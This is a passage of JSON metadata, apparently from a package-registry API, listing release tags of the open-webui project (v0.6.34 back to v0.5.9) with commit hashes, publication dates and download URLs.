ull,"purl":"pkg:github/open-webui/open-webui@v0.6.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34/manifests"},{"name":"v0.6.33","sha":"8d7d79d54b9160425fc5050b3484bec40dd3b44e","kind":"commit","published_at":"2025-10-07T21:20:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33/manifests"},{"name":"v0.6.32","sha":"37d1c85c996e1bdcd505e1e6d62b2f17acd8df23","kind":"commit","published_at":"2025-09-29T06:13:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32/manifests"},{"name":"v0.6.31","sha":"598282cf75de358215d045c617e70d28bc48929e","kind":"commit","published_at":"2025-09-25T20:28:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31/manifests"},{"name":"v0.6.30","sha":"8920bf23774edd829e54e65b043864afb97bf2cf","kind":"commit","published_at":"2025-09-17T17:25:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30/manifests"},{"name":"v0.6.29","sha":"dddd1e44f37e0b489d10abbc21667e16d62722f6","kind":"commit","published_at":"2025-09-17T16:32:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29/manifests"},{"name":"v0.6.28","sha":"171021cfa4276f63fd9fd7f31fa0c904fb13c24c","kind":"commit","published_at":"2025-09-10T10:53:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28/manifests"},{"name":"v0.6.27","sha":"918f507d8cdc652ae913b8596877a8a50b845114","kind":"commit","published_at":"2025-09-09T14:34:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27/manifests"},{"name":"v0.6.26","sha":"2407d9b905978d68619bdce4021e424046ec8df9","kind":"commit","published_at":"2025-08-28T10:40:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26/manifests"},{"name":"v0.6.25","sha":"1db8dec4f52fc0fa8f8f7bfbb8ea5bde41fee17d","kind":"commit","published_at":"2025-08-22T13:22:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25/manifests"},{"name":"v0.6.24","sha":"2777bab1485aad097aa41c44a76f49be141eb061","kind":"commit","published_at":"2025-08-22T10:06:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24/manifests"},{"name":"v0.6.23","sha":"407dc9a401fc2382df06d776dbd8ba95dffda38a","kind":"commit","published_at":"2025-08-21T18:21:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23/manifests"},{"name":"v0.6.22","sha":"438e5d966f0f64f9ea3feab22724a5bd96a4127b","kind":"commit","published_at":"2025-08-11T13:15:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22/manifests"},{"name":"v0.6.21","sha":"30d0f8b1f6cc45ac3ee7e05ccb5c849366680231","kind":"commit","published_at":"2025-08-10T13:39:57.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21/manifests"},{"name":"v0.6.20","sha":"3f35ba27fc31500e2b1085f067371541becd5165","kind":"commit","published_at":"2025-08-09T22:59:14.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20/manifests"},{"name":"v0.6.19","sha":"2c3655a9694fc3f9a428e5521f42a187901d8dc0","kind":"commit","published_at":"2025-08-09T22:38:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19/manifests"},{"name":"v0.6.18","sha":"5fbfe2bdcadf5f157926f6551891e4dc0802b9f3","kind":"commit","published_at":"2025-07-19T19:26:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18/manifests"},{"name":"v0.6.17","sha":"b249809d2dff7bc89394a61ee5f7e258b295623a","kind":"commit","published_at":"2025-07-19T17:39:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17/manifests"},{"name":"v0.6.16","sha":"f966935d1da56a1f9f8691c1f62d68eecc0438fa","kind":"commit","published_at":"2025-07-14T17:39:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16/manifests"},{"name":"v0.6.15","sha":"b5f4c85bb196c16a775802907aedd87366f58b0f","kind":"commit","published_at":"2025-06-16T14:34:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15/manifests"},{"name":"v0.6.14","sha":"63256136ef8322210c01c2bb322097d1ccfb8c6f","kind":"commit","published_at":"2025-06-10T14:17:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14/manifests"},{"name":"v0.6.13","sha":"53764fe64884da147359e54ed6d9607fe57f1600","kind":"commit","published_at":"2025-05-29T21:37:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13/manifests"},{"name":"v0.6.12","sha":"ba0088f39b7a093920b142a5172554686f24df60","kind":"commit","published_at":"2025-05-28T23:59:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12/manifests"},{"name":"v0.6.11","sha":"9faa4c6a4cd8dd643cddb93dccb65c6609488a29","kind":"commit","published_at":"2025-05-26T22:27:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11/manifests"},{"name":"v0.6.10","sha":"e6afa69f59295d2930ff57285d0933e207d8e4c3","kind":"commit","published_at":"2025-05-19T01:34:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10/manifests"},{"name":"v0.6.9","sha":"0cef844168e97b70de2abee4c076cc30ffec6193","kind":"commit","published_at":"2025-05-10T19:04:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"ef301aa16b84f9cbc0ece18539f9db80bff0f605","kind":"commit","published_at":"2025-05-10T15:31:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"a3bb7df61058e690a76cebb7681bd5390e77d226","kind":"commit","published_at":"2025-05-06T23:08:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"23b9354cf6575bfe82e67df0660128d5a92461fc","kind":"commit","published_at":"2025-05-05T13:58:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"07d8460126a686de9a99e2662d06106e22c3f6b6","kind":"commit","published_at":"2025-04-14T09:13:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5/manifests"},{"name":"v0.6.4","sha":"aca37f592d0dedea2529fcb4304e4ff39e0c1219","kind":"commit","published_at":"2025-04-13T06:01:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4/manifests"},{"name":"v0.6.3","sha":"8b0e565e2c8a8f47f54ef039eb132ddb756e83a6","kind":"commit","published_at":"2025-04-13T05:44:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3/manifests"},{"name":"v0.6.2","sha":"63533c9e3ab41edd7bd4124ef94f6b6dc09aa175","kind":"commit","published_at":"2025-04-07T03:41:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2/manifests"},{"name":"v0.6.1","sha":"da948351658602fb7870b3e8573ad2b6f1ace09e","kind":"commit","published_at":"2025-04-05T17:15:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1/manifests"},{"name":"v0.6.0","sha":"04799f1f95f958674d35ba4854ef62754a4d332e","kind":"commit","published_at":"2025-04-01T01:47:18.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0/manifests"},{"name":"v0.5.20","sha":"3b70cd64d7fa6902e8c79cf8dcbf3c7e84cf704b","kind":"commit","published_at":"2025-03-06T03:44:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20/manifests"},{"name":"v0.5.19","sha":"1a51584fe02ba917e229f52367363ff783babd22","kind":"commit","published_at":"2025-03-05T06:22:20.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19/manifests"},{"name":"v0.5.18","sha":"95cadaca72e676199caf894f40cc132d7c8416df","kind":"commit","published_at":"2025-02-27T20:00:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18/manifests"},{"name":"v0.5.17","sha":"15485e7c5d2c09857acce10e311707e2bb8e86c9","kind":"commit","published_at":"2025-02-27T11:46:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17/manifests"},{"name":"v0.5.16","sha":"6fedd72e3973e1d13c9daf540350cd822826bf27","kind":"commit","published_at":"2025-02-20T19:26:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16/manifests"},{"name":"v0.5.15","sha":"9fdf2cd16c38d1711616925e852f17cac865d5fe","kind":"commit","published_at":"2025-02-20T10:01:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15/manifests"},{"name":"v0.5.14","sha":"3f3a5bb0ab8ce3425f317f1e57b084523aa2b2a5","kind":"commit","published_at":"2025-02-18T05:48:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14/manifests"},{"name":"v0.5.13","sha":"e4c9734fcba5105c30de874fd4c21c602dbd08a6","kind":"commit","published_at":"2025-02-18T04:36:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13/manifests"},{"name":"v0.5.12","sha":"2017856791b666fac5f1c2f80a3bc7916439438b","kind":"commit","published_at":"2025-02-14T07:12:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12/manifests"},{"name":"v0.5.11","sha":"4d667e447d0ae09e7723b979a699d0e85806552b","kind":"commit","published_at":"2025-02-13T10:06:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11/manifests"},{"name":"v0.5.10","sha":"e9d6ada25cd6ce84be067ba794af4c9d7116edc7","kind":"commit","published_at":"2025-02-05T22:46:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10/manifests"},{"name":"v0.5.9","sha":"ab94468ffa765c9ed169cff3a7caa18e85f434db","kind":"commit","published_at":"2025-02-05T10:38:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.9","dependencies_parsed_at":null,"dependency_job_id":null,"pur